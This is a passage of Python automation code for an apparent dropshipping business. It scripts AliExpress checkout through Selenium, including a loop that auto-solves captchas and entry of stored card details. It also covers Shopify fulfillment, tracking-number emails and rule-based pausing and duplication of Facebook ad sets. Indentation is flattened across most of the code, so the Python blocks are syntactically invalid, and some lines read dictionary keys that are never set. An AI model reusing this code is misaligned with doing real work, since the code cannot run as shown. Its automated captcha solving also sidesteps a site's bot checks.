self_.ss.fcn("next-checkbox-input").click().sp(7).pagestop_timeout().fid("checkout-button").click().sp(5).tp(lambda:self_.ss.frame("poplay-order").fcn("switch-to-full").click().sp(3)).sp(5)
# Adjust Cost Based on Shipping
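# The cart-level shipping charge and sales tax are read from the "charge-item" rows and
# prorated: the per-order shipping amount divides the charge by the number of orders that
# are not marked "Free Shipping", the tax amount divides by the total number of orders,
# and both amounts are then added onto every order's ali_price.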
shipping_cost = flt(Join(".",findall(sudby(lambda i:"Shipping" in i,sud("text",self_.ss.fcns("charge-item")))[0],"\d+\.\d+")))
sales_tax_cost = flt(Join(".",findall(sudby(lambda i:"tax" in i,sud("text",self_.ss.fcns("charge-item")))[0],"\d+\.\d+"))) if sudby(lambda i:"tax" in i,sud("text",self_.ss.fcns("charge-item"))) else 0
free_shipping_orders_count = len([i for i in self_.ss.fcns("shopping-cart-product") if i.find_elements_by_class_name("logistics-cost")[0].text == "Free Shipping"])
additional_shipping_cost = or_list(lambda:shipping_cost/(len(self_.orders)-free_shipping_orders_count),lambda:0)
additional_sales_tax_cost = or_list(lambda:sales_tax_cost/(len(self_.orders)),lambda:0)
OSA.log("The additional shipping cost: %s" % (additional_shipping_cost))
lmap(lambda i: setattr(i,"ali_price",i.ali_price+additional_shipping_cost+additional_sales_tax_cost),self_.orders)
# 3/1: the is_webmoney case did not show up once; keep watching whether this happens for other orders.
is_webmoney = False
# self_.ss.ffst("p","Payment Methods").click().sp(4).tp(lambda:self_.ss.jcns("pay-title","click",{"text":"Show all payment methods"}).sp(2))
self_.ss.fcns("payment-title").click().sp(4).tp(lambda:self_.ss.jcns("pay-title","click",{"text":"Show all payment methods"}).sp(2))
if "WESTUNION" in [i.text for i in self_.ss.fcns("disabled")]: is_webmoney = True
if is_webmoney == False: self_.ss.fcn("west-union").click().sp(3)
elif is_webmoney == True: self_.ss.fcn("wm-ebank").click().sp(3)
self_.ss.tp(lambda:[(i.click(),time.sleep(2)) for i in self_.ss.jcns("seller-message-title",0,{"ae_button_type":"message_for_seller"})])
self_.ss.tp(lambda: lmap(lambda i: [i.clear(), i.send_keys("Hello, I am dropshipping, please send this without price or invoice\nThank you"), sp(2)], self_.ss.ftns("textarea")))
# datas = [{"qty":i.quantity,"title":i.title,"url":Get(Product,id=i.product_id).ali_url,"variant_title":i.variant_title,"idx":idx} for idx, i in enum(unfulfilled_orders)]
datas = [{"qty":i.quantity,"title":i.title,"url":InceptedProduct().RScan(i.product_id).ali_url,"variant_title":i.variant_title,"idx":idx} for idx, i in enum(self_.orders)]
OSA.log("Check datas:\n\n%s"%(str(json.dumps(datas,indent=4))))
Exec('# Captcha Loop Until Able To Check Out\nif self_.ss.fcns("captche-input",6):\n OSA.log("Found captcha")\n while self_.ss.fcns("captche-input",6):\n self_.ss.fcn("captche-input").send_keys(handle_captcha(findall(self_.ss.page_source,1,\'(http://captcha.alibaba.com.*?)"\').replace("amp;",""))[\'text\'])\n complete_order = True\n if complete_order == True:\n ss.fid("checkout-button").click().sp(30)\n # ifdo(lambda:"shoppingcart.aliexpress.com/order/confirm_order.htm" in self_.ss.current_url, lambda:[self_.ss.ffst("p","Payment Methods").click().ffst("p","Other payment methods").click().ffst("button","Confirm").click().sp(2), lmap(lambda i: [i.clear(), i.send_keys("Hello dear, I am dropshipping, please send this without price or invoice\\nThank you"), sp(1)], self_.ss.ftns("textarea"))])\n ifdo(lambda:"shoppingcart.aliexpress.com/order/confirm_order.htm" in self_.ss.current_url, lambda:[self_.ss.ffst("p","Payment Methods").click().ffst("button","Confirm").click().sp(2), lmap(lambda i: [i.clear(), i.send_keys("Hello dear, I am dropshipping, please send this without price or invoice\\nThank you"), sp(1)], self_.ss.ftns("textarea"))])\n # input("Proceed")\nelse:\n complete_order = True\n if complete_order == True:\n self_.ss.fid("checkout-button").click().sp(30)',globals(),locals())
globals().update(locals())
self_.ss.get("https://trade.aliexpress.com/orderList.htm").fcn("msg-detail").click()
order_ids = lmap(lambda i:int(i.find_elements_by_class_name("info-body")[0].text),self_.ss.fcns("order-info"))
self_.ss.zoom_level(2).fcn("all-selector").click().fid("TP_CombinPay").click().sp(5).frame("poplay-order")
price,card_id=float(Join(".",findall(self_.ss.fcn("price-value").text,"\d+"))),findall(self_.ss.fcn('payment-title').text,"\d+")[1]
self_.ss.fcns("btn-bind").click().sp(10)
if len(self_.ss.jcns("next-message-title",0,{"text":"Payment Successful"})) == 0:
if self_.ss.fcns("card-number-input"):
self_.ss.fid("cardNum").send_keys(Shop()(x_shop).AliExpress_Financial_Card_Information["Financial_Card_Number"])
self_.ss.sp(10)
self_.ss.ffst("button","Confirm").click()
self_.ss.sp(30)
elif self_.ss.ftns("iframe") and self_.ss.fids("expires"):
self_.ss.fid("expires").send_keys(Shop()(x_shop).AliExpress_Financial_Card_Information["Financial_Card_Expiration_Date"])
self_.ss.sp(10)
self_.ss.fcns("next-btn-primary").click()
self_.ss.sp(30)
ifdo(lambda:len(order_ids)!=1,lambda:OSA.log("The number of order numbers is %s, not 1."%(len(order_ids)),tp=False))
lmap(lambda i:Update(i,saved_address_screenshot=open(shipping_address_,"rb").read()),self_.orders)
PaidCardNumber(order_ids=order_ids,price=price,card_id=card_id,paid_at = Date().Now() ).save()
lmap(lambda i: [Update(i,ali_order_number=order_ids[0],fulfillment_status="fulfilled",t2=Date().myDatetimenow()),Update(i,e1=i.t2-i.t1)], self_.orders)
lmap(lambda i: exec("assert Get(Lineitem,id=i.id).fulfillment_status == 'fulfilled'"), self_.orders)  # verify each line item is now marked fulfilled
real_order_shopify_side = self_.shop.ofind(id_=self_.real_order.id)
line_items = keyby(lambda i:i.id in sud("id", self_.fulfilled_line_items), real_order_shopify_side.line_items)
lmap(lambda i:xir(i,fulfillment_status="fulfilled"),line_items)
line_items = lmap(lambda i:i.to_dict(), line_items)
lmap(lambda i: delete_keys(i,"admin_graphql_api_id","discount_allocations","origin_location","price_set","total_discount_set"), line_items)
data = dict(line_items=line_items,order_id=self_.real_order.id,notify_customer=True,service="manual",location_id=self_.shop.location_id)
print("\n===fulfillment_data\n%s"%json.dumps(data, indent=4))
new_fulfillment = self_.shop.shopify.Fulfillment(data)
ifdo(lambda: new_fulfillment.save() != True,lambda:OSA.log("Fulfillment did not save."))
ordersFeed(self_.real_order.shop,7)
self_.real_order = Get(Order,id=self_.real_order.id)
self_.saved_data_2 = [{"shipping_address":address_string_from_dict(self_.real_order.shipping_address),"idx":idx,"total quantity":i["quantity"],"title":i["title"],"variant_title":i["variant_title"],"fulfilled quantity":i["quantity"] if i["fulfillment_status"] == "fulfilled" else 0, "ali_url":InceptedProduct().RScan(Get(Lineitem,id=i["id"]).product_id).ali_url,"sku":i["sku"]} for idx,i in enum(self_.real_order.line_items)]
OSA.log(df=Join("\n",[compare_dict(a,b) for a,b in zip(self_.saved_data_1,self_.saved_data_2)]))
self_()
class Orders(object):
    def __init__(self, shop):
        self.shop = Shop()(init_shop=shop)
self.ordersCreate()
self.ordersTrack()
self.similarimagesCreate()
self.ordersEmail()
def transmit(self):
ordersSheet.postSelf(Order.Objects())
def ordersCreate(self):
pass
def ordersTrack(self):
pass
def ordersEmail(self):
pass
def similarimagesCreate(self):
pass
class ordersEmail(object):
def __init__(self, shop):
self.e = Emailer(shop.Business_Email_Address)
def formulate_email(self, shop, order_no, contact_name, to_email, tracking_number_list):
print("Sending Email")
subject = 'Your %s Tracking Number for Order # %s' % (shop.Business_Name, order_no)
to = to_email
msgHtml = "<br>Dear %s,<br /><br>Thank you for your purchase at %s! <br /> <br> Attached is the tracking number for Order #%s: "% (contact_name.title(), shop.Business_Name, order_no)
msgHtml += "<br>Shipping is via USPS and may be tracked as follows: <br />"
tracking_link = "<br>Link: https://www.17track.net/en/track?nums="
for tn in tracking_number_list:
tracking_link += '%s,'%tn
tracking_link += "<br /><br><br />"
for i in tracking_number_list:
tracking_link += "<br>%s<br />" % i
msgHtml += tracking_link
msgHtml += "<br>Please do not hesitate to reply back to this email if you have any questions.<br />"
msgHtml += "<br><br /><br> - Lilith from %s<br />" % shop.Business_Name
print(msgHtml)
return_status = self.e.send_message(subject,to,msgHtml)
print("sleeping 5 seconds to assure no rate limiting.. ")
time.sleep(5)
globals()['return_status'] = return_status
if 'HttpError' in return_status:
print('HttpError ', return_status, "Sleeping 10 Minutes")
time.sleep(600)
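# Appends a newly obtained AliExpress tracking number to the existing Shopify fulfillment
# that contains the given line item, maps the AliExpress shipping method to a tracking
# company (defaulting to USPS) and saves the fulfillment; the save is aborted if the
# Fulfillments_Created record cannot be written first.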
def create_new_fulfillment(line_item,shopify_order,tracking_company_dict):
OSA.log("Creating new tracking number fulfillment: %s, %s" % (line_item.ali_tracking_number, tracking_company_dict))
Update(line_item,ali_tracking_number = line_item.ali_tracking_number.strip())
fulfillment = None
for i in shopify_order.fulfillments:
for j in i.line_items:
if j.id == line_item.id:
fulfillment = i
fulfillment.tracking_numbers.append(str(line_item.ali_tracking_number.strip()))
fulfillment.tracking_urls.extend(["https://tools.usps.com/go/TrackConfirmAction?tLabels={}".format(line_item.ali_tracking_number.strip()),"https://t.17track.net/en#nums={}".format(line_item.ali_tracking_number.strip())])
fulfillment.tracking_company = tracking_company_dict.get(line_item.ali_tracking_method, "USPS")
try:
Fulfillments_Created().add(order_id=shopify_order.id,lineitem_id=line_item.id,tracking_company_dict=fulfillment.to_dict())
OSA().log("Fulfillments_Created saved")
except Exception as e:
print(e)
OSA().log("Fulfillment could not create. Not saving the fulfillment.")
        (0/0)  # deliberately raise ZeroDivisionError so the run halts when the fulfillment record could not be saved
redprint("saved fulfillment: %s" % fulfillment.save())
redprint("An email will be sent out. ")
class Aliexpress_Core(object):
def __init__(self,window_index=[0,0,3.5,3.5],ph=True,exit_browser=True):
setattrs(self,"username",a_shop().AliExpress_Email,"password",a_shop().AliExpress_Password,)
self.rq = Aliexpress_Requests()()
class Aliexpress_Login:
def __init__(self,window_index=[0,0,3.5,3.5],ph=False,exit_browser=True):
setattrs(self,"ph",ph,"exit_browser",exit_browser,"window_index",window_index,"headers",session_headers,"username",Get(Shop,shop_abbreviation=Muta()().store_abbre).AliExpress_Email,"password",Get(Shop,shop_abbreviation=Muta()().store_abbre).AliExpress_Password,)
globalise(Browser()( ("sele") ).get("https://login.aliexpress.com/").sp(5).tp(lambda:globe("ss_v").frame("alibaba-login-box")).bat().fid("fm-login-id").fid("fm-login-password").fcn("password-login").bat(self.username,self.password,globe("ss_v").SHADOW.ENTER).sp(10).tp(lambda: cookies_to_database(username=self.username,website_name="AliExpress",cookies=globe("ss_v").get_cookies(),reverse=False)).tp(lambda:setattr(self,"rq",cookies_to_session(cookies_to_database(self.username,"AliExpress"),requests.Session()))).tp(lambda:globe("ss_v").quit()if(self.exit_browser)else()),"ss")
class Tracker_Updates:
def run(self,shop):
for i in onyx_lineitems("e1"):
i.update_tracker_data() # events = self.get_tracking_events()
for i in onyx_lineitems("e2"):
if i.ali_order_number:
i.update_tracker_data()
for i in onyx_lineitems("e3"):
if i.ali_order_number:
i.update_tracker_data()
class InventoryLevel:
def adjust(self, shop, variant, available_adjustment):
original = (variant.inventory_quantity if(dict!=type(variant))else(variant["inventory_quantity"]))
calls = ((Shop()(shop) if(str==type(shop))else(shop)).shopify.InventoryLevel.adjust(location_id=(Shop()(shop) if(str==type(shop))else(shop)).location_id, inventory_item_id = (variant.inventory_item_id if(dict!=type(variant))else(variant["inventory_item_id"])),available_adjustment = available_adjustment))
while True:
ensurement = ((Shop()(shop) if(str==type(shop))else(shop)).shopify.Variant.find(id_=(variant.id if(dict!=type(variant))else(variant["id"])))).inventory_quantity
            # re-read the variant's inventory_quantity and compare it with the original reading, ensuring it changed by exactly available_adjustment.
changed_amount = available_adjustment
            twine = changed_amount == (ensurement - original)
            redprint("changed_amount:%s\nensurement-original:%s" % (changed_amount, ensurement - original))
if twine == True:
break
else:
redprint("||Waiting for updated inventory amount..")
time.sleep(0.5)
redprint("--end")
        assert changed_amount == (ensurement - original)
time.sleep(0.25)
return calls
""" Business-Utils-Ad-Utils """
def Ads(shop):
active_ads = adsFeed(shop, date_range=100, bd=True, filters='active')
paused_ads = adsFeed(shop, date_range=7, bd=True, filters='paused')
_ads_utils_daily_stop(adsets = active_ads)
_ads_utils_daily_restart(adsets = paused_ads)
try: shop.ff.quit()
except: pass
def Ads_Duplicate(shop):
"""
Download All Ad Sets
Get All Campaigns via API
For each Campaign:
Get All Ads
Targeting_Spec_Dict keying Ads Targeting_Specs
For Each Targeting_Spec:
Create a current_budget_list
Discover count new_budgets
Duplicate the $5 ad set Accordingly to the count_new_budgets & current_budget_list
"""
count_of_newly_created_adsets = 0
sum_of_newly_created_adsets_budget = 0
#Download All Ad Sets
csv_adsets = None
if datetime.now().hour in [0,1,2]:
csv_adsets = adsFeed(shop, date_range=1, bd=True, filters=None)
else:
csv_adsets = adsFeed(shop, date_range=0, bd=True, filters=None)
errors=0
#Create a Group of Active Campaign IDs
campaigns = shop.fb.get_campaigns(params={'limit':9000})
for campaign in campaigns:
major_dict = {}
adsets = campaign.get_ad_sets()
for adset in adsets:
targeting_spec = '%s' % adset.remote_read(fields=['targeting', 'daily_budget'])['targeting']._json
print('targeting spec:\n%s\n\n\n'%targeting_spec)
if targeting_spec not in major_dict.keys():
major_dict[targeting_spec] = []
major_dict[targeting_spec].append(adset)
elif targeting_spec in major_dict.keys():
major_dict[targeting_spec].append(adset)
targeting_spec_count = len(major_dict.keys())
print("targeting spec count: %s" % targeting_spec_count)
for targeting_spec, adsets in major_dict.items():
current_budget_list = sorted(list(map(int, key('daily_budget', adsets))), reverse=False)
print("current budget list: %s" % current_budget_list)
original_adset = None
roi_list = []
for adset in adsets:
if adset['daily_budget'] == "500":
original_adset = adset
for csv_adset in csv_adsets:
if csv_adset['Ad Set ID'] == adset['id']:
roi_list.append(csv_adset['roi'])
print("original_adset: %s" % original_adset['id'])
print("roi_list: %s, count: %s" % (roi_list, len(roi_list)))
count_of_good_rois = len([i for i in roi_list if i > 2])
print("count of good rois: %s" % count_of_good_rois)
new_budgets = list(range(max(current_budget_list) + 500, 40000, 500))[:count_of_good_rois]
print("new rois: %s" % new_budgets)
for new_budget in new_budgets:
try:
new_adset, new_ad = Copy(shop, original_adset['id'])
print("making a copy")
new_adset['daily_budget'] = new_budget
new_adset.remote_read(fields=['name', 'start_time', 'effective_status', ])
new_adset.remote_update()
print('new adset: %s\n' % new_adset)
time.sleep(12)
count_of_newly_created_adsets += 1
sum_of_newly_created_adsets_budget += new_budget
except:
errors+=1
print("error with duplication count is: %s"%errors)
print('\n\n\n\n\n')
print("sum of current_budget_today: %s" % (sum(list(map(int, key(csv_adsets, 'Budget'))))))
print("sum of current_budget_today spent so far: %s" % (sum(list(map(float, key(csv_adsets, 'Amount Spent (USD)'))))))
print("sum of purchases value today so far: %s" % (sum(list(map(float, key(csv_adsets, 'Website Purchases Conversion Value'))))))
print("sum of purchases value target today: %s" % (sum(list(map(int, key(csv_adsets, 'Budget')))) * 2))
print("count of newly created adsets: %s" % count_of_newly_created_adsets)
print("sum of newly created adsets budgets: %s" % sum_of_newly_created_adsets_budget)
print('\n\n\n\n\n')
print('-'*20)
def _ads_utils_daily_restart(adsets):
# ads_utils_restart_if_sale_in_last_20_spent
# get_adm_url_by_ids(shop, id_list=restart_ids, date_range=180)
# Directions: Just get_adm_url, and hit 'turn on'
# delivery, inactive, go to ads, set bd-> daily, sort adname
# ads_util_restart_adsets(id_list=restart_ids)
if len(adsets) == 0:
return
adset_ids = key(adsets, key='Ad Set ID')
# dict with key as adset_id
data = dict(zip(adset_ids, [[] for i in range(len(adset_ids))]))
# dict with values as all days with that adset_id
for i in adsets:
i['date'] = Date(i['Reporting Starts']).dateobj
for a in data:
for i in adsets:
if i['Ad Set ID'] == a:
data[a].append(i)
# sort adsets based on date ordered past to future
# sets spent, purchases, num_consec_bad to 0,0,0
# for each adset_id, for each day in the value list, adds the spent, purchases.
# if spent >20, purchases == 0, no matter the day, it is a bad consecutive adset.
# if it is bad, sets spent, purchases, to 0,0 to restart count & not overlap
# assigns num_consec_bad to adset's dict.
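    # Illustrative example: daily rows with (spent, purchases) of (15, 0), (10, 0), (5, 1)
    # accumulate to 25 spent with 0 purchases after day two, so num_consec_bad becomes 1 and
    # the counters reset before the purchase on day three is tallied.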
for a in data:
data[a] = keysort('date', data[a], tcer=False)
for k,v in data.items():
spent = 0
purchases = 0
num_consec_bad = 0
for adset in v:
spent += float(adset['Amount Spent (USD)'])
purchases += float(adset['Website Purchases'])
#print(spent, purchases)
if spent > 20 and purchases == 0:
num_consec_bad += 1
purchases = 0
spent = 0
adset['num_consec_bad'] = num_consec_bad
print('Ad Set ID: %s | num_consec_bad: %s' % (adset['Ad Set ID'], adset['num_consec_bad']))
# sorts adsets ordered now to backthen
# if num_consec_bad is > 3, do not restart
# otherwise, counts from date now to backthen, if has purchase in last 20 spent, add to restart_id list.
for a in data:
data[a] = keysort('date', data[a], tcer=True)
restart_ids = []
for k,v in data.items():
day = 0
spent = 0
purchases = 0
for adset in v:
day += 1
spent += float(adset['Amount Spent (USD)'])
purchases += float(adset['Website Purchases'])
print("date: %s, spent: %s, pcs: %s" % (adset['date'], adset['Amount Spent (USD)'], adset['Website Purchases']))
if day <= 4 and spent <= 20 and purchases > 0:
if adset['num_consec_bad'] <= 2:
print("will be restarted... ")
restart_ids.append(int(adset['Ad Set ID'].replace('c:','')))
print("\n\n\n")
restart_ids = list(set(restart_ids))
for _id in restart_ids:
print("RESTART_IDS: %s"%_id)
#get_adm_url_by_ids(shop, restart_ids, action='restart')
_ads_utils_restart_adsets(list(set(restart_ids)))
def _ads_utils_daily_stop(adsets):
if len(adsets) == 0:
return
print(""" If you want to check against it, generate list of pause_ids,
filter-> delivery: active,&go to ads,& set bd->daily,& sort adname.""")
for i in adsets:
i['id_'] = i['Ad Set ID'].replace('c:','')
i['date'] = Date(i['Reporting Starts']).dateobj
pause_ids = []
adset_ids = list(set(key(adsets, key='id_')))
for id in adset_ids:
sorted_ads = keysort('date', keyequals('id_', id, adsets), tcer=True)
spent = 0
pcs = 0
print('id: %s' % id)
for adset in sorted_ads:
spent += float(adset['Amount Spent (USD)'])
pcs += float(adset['Website Purchases'])
print("date: %s, spent: %s, pcs: %s" % (adset['date'], adset['spent'], adset['pcs']))
if (spent >= 20 and pcs == 0):
print("spend over 20: %s" % (spent - 20))
pause_id = adset['id_']
if pause_id not in pause_ids:
pause_ids.append(pause_id)
print("will be paused.")
print('\n\n')
time.sleep(8)
    #get_adm_url_by_ids(shop, pause_ids, action='pause')
    _ads_utils_pause_adsets(list(set(pause_ids)))
def _ads_utils_pause_adsets(id_list):
id_list = list(set(id_list))
for adset_id in list(set(id_list)):
adset = AdSet(adset_id)
adset['status'] = 'PAUSED'
status_check = adset.remote_update()
print("adset %s: %s √"%(adset_id, status_check))
assert status_check['status'] == 'PAUSED'
ad = adset.get_ads()[0]
ad['status'] = "PAUSED"
status_check = ad.remote_update()
assert status_check['status'] == 'PAUSED'
print("ad %s: %s √" % (ad['id'], status_check))
print('\n\n')
time.sleep(10)
# tested and works
def _ads_utils_restart_adsets(id_list):
for adset_id in id_list:
adset = AdSet(adset_id)
adset['status'] = 'ACTIVE'
status_check = adset.remote_update()
print("%s: %s √"%(adset_id, status_check))
assert status_check['status'] == 'ACTIVE'
ad = adset.get_ads()[0]
ad["status"] = "ACTIVE"
status_check = ad.remote_update()
assert status_check['status'] == "ACTIVE"
print("ad %s: %s √" % (ad['id'], status_check))
print('\n\n')
time.sleep(10)
# tested and works
def _create_custom(handle, shop):
print("...Creating Custom...")
audience = CustomAudience(parent_id='act_%s' %shop.Facebook_Business_Ad_Account_ID); zz(12)
print("Creating %s for handle: %s"%(audience, handle))
params={'pixel_id': shop.Facebook_Pixel_ID,'subtype':'WEBSITE','retention_days':'180',
'rule':{"url":{"i_contains": handle}}, 'name':handle,}
custom = audience.remote_create(params=params)['id']
print("Successfully Created Custom Audience... \n%s"%custom)
return custom
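# Copies a large JavaScript snippet to the clipboard and then repeatedly injects a one-line
# version of it via chromejs() to force fixed column widths in the Ads Manager report table
# (the class names are Facebook-internal and may change at any time).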
def adjust_ad_columns():
pyperclip.copy('x = document.getElementsByTagName("div")\ny = []\nz = x.length\nfor (i=0;i<z;i++) {a=x[i]; if (a.getAttribute("data-testid")=="FixedDataTableRow") {y=y.concat(a);}}\nb = y.length\nfor (i=0;i<b;i++) {\n a = y[i];\n c = a.getElementsByClassName("_4h2m");\n console.log(c.length);\n d = c[0]; d.style.width = "40px"; d.style.left = "0px";\n d = c[1]; d.style.width = "40px"; d.style.left = "40px";\n d = c[2]; d.style.width = "160px"; d.style.left = "80px";\n d = c[3]; d.style.width = "100px"; d.style.left = "0px";\n d = c[4]; d.style.width = "100px"; d.style.left = "100px";\n d = c[5]; d.style.width = "100px"; d.style.left = "200px";\n d = c[6]; d.style.width = "100px"; d.style.left = "300px";\n d = c[7]; d.style.width = "100px"; d.style.left = "400px";\n d = c[8]; d.style.width = "100px"; d.style.left = "500px";\n d = c[9]; d.style.width = "100px"; d.style.left = "600px";\n d = c[10]; d.style.width = "100px"; d.style.left = "700px";\n d = c[11]; d.style.width = "100px"; d.style.left = "800px";\n d = c[12]; d.style.width = "100px"; d.style.left = "900px";\n d = c[13]; d.style.width = "100px"; d.style.left = "1000px";\n d = c[14]; d.style.width = "100px"; d.style.left = "1100px";\n d = c[15]; d.style.width = "100px"; d.style.left = "1200px";\n d = c[16]; d.style.width = "100px"; d.style.left = "1300px";\n d = c[17]; d.style.width = "100px"; d.style.left = "1400px";\n e = a.getElementsByClassName("_3pzk");\n f = e[1]; f.style.width = "241px"; f.style.left = "241px";\n}\nx = document.getElementsByClassName("_1mic")[0];\ny = x.getElementsByClassName("_4h2m");\nz = y[0]; z.style.width = "40px"; z.style.left = "0px";\nz = y[1]; z.style.width = "40px"; z.style.left = "40px";\nz = y[2]; z.style.width = "160px"; z.style.left = "80px";\nz = y[3]; z.style.width = "100px"; z.style.left = "0px";\nz = y[4]; z.style.width = "100px"; z.style.left = "100px";\nz = y[5]; z.style.width = "100px"; z.style.left = "200px";\nz = y[6]; z.style.width = "100px"; z.style.left = "300px";\nz = y[7]; z.style.width = "100px"; z.style.left = "400px";\nz = y[8]; z.style.width = "100px"; z.style.left = "500px";\nz = y[9]; z.style.width = "100px"; z.style.left = "600px";\nz = y[10]; z.style.width = "100px"; z.style.left = "700px";\nz = y[11]; z.style.width = "100px"; z.style.left = "800px";\nz = y[12]; z.style.width = "100px"; z.style.left = "900px";\nz = y[13]; z.style.width = "100px"; z.style.left = "1000px";\nz = y[14]; z.style.width = "100px"; z.style.left = "1100px";\nz = y[15]; z.style.width = "100px"; z.style.left = "1200px";\nz = y[16]; z.style.width = "100px"; z.style.left = "1300px";\nz = y[17]; z.style.width = "100px"; z.style.left = "1400px";\ne = x.getElementsByClassName("_3pzk");\nf = e[1]; f.style.width = "241px"; f.style.left = "241px";\n\nx = document.getElementsByClassName("_1mme")[0];\ny = x.getElementsByClassName("_1eyi");\nz = y[0]; z.style.width = "40px"; z.style.left = "0px";\nz = y[1]; z.style.width = "40px"; z.style.left = "40px";\nz = y[2]; z.style.width = "160px"; z.style.left = "80px";\nz = y[3]; z.style.width = "100px"; z.style.left = "0px";\nz = y[4]; z.style.width = "100px"; z.style.left = "100px";\nz = y[5]; z.style.width = "100px"; z.style.left = "200px";\nz = y[6]; z.style.width = "100px"; z.style.left = "300px";\nz = y[7]; z.style.width = "100px"; z.style.left = "400px";\nz = y[8]; z.style.width = "100px"; z.style.left = "500px";\nz = y[9]; z.style.width = "100px"; z.style.left = "600px";\nz = y[10]; z.style.width = "100px"; z.style.left = "700px";\nz = y[11]; z.style.width = 
"100px"; z.style.left = "800px";\nz = y[12]; z.style.width = "100px"; z.style.left = "900px";\nz = y[13]; z.style.width = "100px"; z.style.left = "1000px";\nz = y[14]; z.style.width = "100px"; z.style.left = "1100px";\nz = y[15]; z.style.width = "100px"; z.style.left = "1200px";\nz = y[16]; z.style.width = "100px"; z.style.left = "1300px";\nz = y[17]; z.style.width = "100px"; z.style.left = "1400px";\ne = x.getElementsByClassName("_182x");\nf = e[1]; f.style.left = "241px";\n\n\nx = document.getElementsByClassName("_1mme")[0];\ny = x.getElementsByClassName("_4h2m");\nz = y[0]; z.style.width = "40px";\nz = y[1]; z.style.width = "40px";\nz = y[2]; z.style.width = "160px";\nz = y[3]; z.style.width = "100px";\nz = y[4]; z.style.width = "100px";\nz = y[5]; z.style.width = "100px";\nz = y[6]; z.style.width = "100px";\nz = y[7]; z.style.width = "100px";\nz = y[8]; z.style.width = "100px";\nz = y[9]; z.style.width = "100px";\nz = y[10]; z.style.width = "100px";\nz = y[11]; z.style.width = "100px";\nz = y[12]; z.style.width = "100px";\nz = y[13]; z.style.width = "100px";\nz = y[14]; z.style.width = "100px";\nz = y[15]; z.style.width = "100px";\nz = y[16]; z.style.width = "100px"; z.style.left = "1300px";\nz = y[17]; z.style.width = "100px"; z.style.left = "1400px";\ne = x.getElementsByClassName("_3pzk");\nf = e[1]; f.style.width = "241px"; f.style.left = "241px";\n')
while True:
chromejs("x = document.getElementsByTagName('div');y = [];z = x.length;for (i=0;i<z;i++) {a=x[i]; if (a.getAttribute('data-testid')=='FixedDataTableRow') {y=y.concat(a);}};b = y.length; for (i=0;i<b;i++) {a = y[i];c = a.getElementsByClassName('_4h2m');console.log(c.length);d = c[0]; d.style.width = '40px'; d.style.left = '0px';d = c[1]; d.style.width = '40px'; d.style.left = '40px';d = c[2]; d.style.width = '160px'; d.style.left = '80px';d = c[3]; d.style.width = '100px'; d.style.left = '0px';d = c[4]; d.style.width = '100px'; d.style.left = '100px';d = c[5]; d.style.width = '100px'; d.style.left = '200px';d = c[6]; d.style.width = '100px'; d.style.left = '300px';d = c[7]; d.style.width = '100px'; d.style.left = '400px';d = c[8]; d.style.width = '100px'; d.style.left = '500px';d = c[9]; d.style.width = '100px'; d.style.left = '600px';d = c[10]; d.style.width = '100px'; d.style.left = '700px';d = c[11]; d.style.width = '100px'; d.style.left = '800px';d = c[12]; d.style.width = '100px'; d.style.left = '900px';d = c[13]; d.style.width = '100px'; d.style.left = '1000px';d = c[14]; d.style.width = '100px'; d.style.left = '1100px';d = c[15]; d.style.width = '100px'; d.style.left = '1200px';d = c[16]; d.style.width = '100px'; d.style.left = '1300px';d = c[17]; d.style.width = '100px'; d.style.left = '1400px';e = a.getElementsByClassName('_3pzk');f = e[1]; f.style.width = '241px'; f.style.left = '241px';}; x = document.getElementsByClassName('_1mic')[0]; y = x.getElementsByClassName('_4h2m'); z = y[0]; z.style.width = '40px'; z.style.left = '0px'; z = y[1]; z.style.width = '40px'; z.style.left = '40px'; z = y[2]; z.style.width = '160px'; z.style.left = '80px'; z = y[3]; z.style.width = '100px'; z.style.left = '0px'; z = y[4]; z.style.width = '100px'; z.style.left = '100px'; z = y[5]; z.style.width = '100px'; z.style.left = '200px'; z = y[6]; z.style.width = '100px'; z.style.left = '300px'; z = y[7]; z.style.width = '100px'; z.style.left = '400px'; z = y[8]; z.style.width = '100px'; z.style.left = '500px'; z = y[9]; z.style.width = '100px'; z.style.left = '600px'; z = y[10]; z.style.width = '100px'; z.style.left = '700px'; z = y[11]; z.style.width = '100px'; z.style.left = '800px'; z = y[12]; z.style.width = '100px'; z.style.left = '900px'; z = y[13]; z.style.width = '100px'; z.style.left = '1000px'; z = y[14]; z.style.width = '100px'; z.style.left = '1100px'; z = y[15]; z.style.width = '100px'; z.style.left = '1200px'; z = y[16]; z.style.width = '100px'; z.style.left = '1300px'; z = y[17]; z.style.width = '100px'; z.style.left = '1400px'; e = x.getElementsByClassName('_3pzk'); f = e[1]; f.style.width = '241px'; f.style.left = '241px'; x = document.getElementsByClassName('_1mme')[0]; y = x.getElementsByClassName('_1eyi'); z = y[0]; z.style.width = '40px'; z.style.left = '0px'; z = y[1]; z.style.width = '40px'; z.style.left = '40px'; z = y[2]; z.style.width = '160px'; z.style.left = '80px'; z = y[3]; z.style.width = '100px'; z.style.left = '0px'; z = y[4]; z.style.width = '100px'; z.style.left = '100px'; z = y[5]; z.style.width = '100px'; z.style.left = '200px'; z = y[6]; z.style.width = '100px'; z.style.left = '300px'; z = y[7]; z.style.width = '100px'; z.style.left = '400px'; z = y[8]; z.style.width = '100px'; z.style.left = '500px'; z = y[9]; z.style.width = '100px'; z.style.left = '600px'; z = y[10]; z.style.width = '100px'; z.style.left = '700px'; z = y[11]; z.style.width = '100px'; z.style.left = '800px'; z = y[12]; z.style.width = '100px'; z.style.left = '900px'; z = y[13]; z.style.width = 
'100px'; z.style.left = '1000px'; z = y[14]; z.style.width = '100px'; z.style.left = '1100px'; z = y[15]; z.style.width = '100px'; z.style.left = '1200px'; z = y[16]; z.style.width = '100px'; z.style.left = '1300px'; z = y[17]; z.style.width = '100px'; z.style.left = '1400px'; e = x.getElementsByClassName('_182x'); f = e[1]; f.style.left = '241px'; x = document.getElementsByClassName('_1mme')[0]; y = x.getElementsByClassName('_4h2m'); z = y[0]; z.style.width = '40px'; z = y[1]; z.style.width = '40px'; z = y[2]; z.style.width = '160px'; z = y[3]; z.style.width = '100px'; z = y[4]; z.style.width = '100px'; z = y[5]; z.style.width = '100px'; z = y[6]; z.style.width = '100px'; z = y[7]; z.style.width = '100px'; z = y[8]; z.style.width = '100px'; z = y[9]; z.style.width = '100px'; z = y[10]; z.style.width = '100px'; z = y[11]; z.style.width = '100px'; z = y[12]; z.style.width = '100px'; z = y[13]; z.style.width = '100px'; z = y[14]; z.style.width = '100px'; z = y[15]; z.style.width = '100px'; z = y[16]; z.style.width = '100px'; z.style.left = '1300px'; z = y[17]; z.style.width = '100px'; z.style.left = 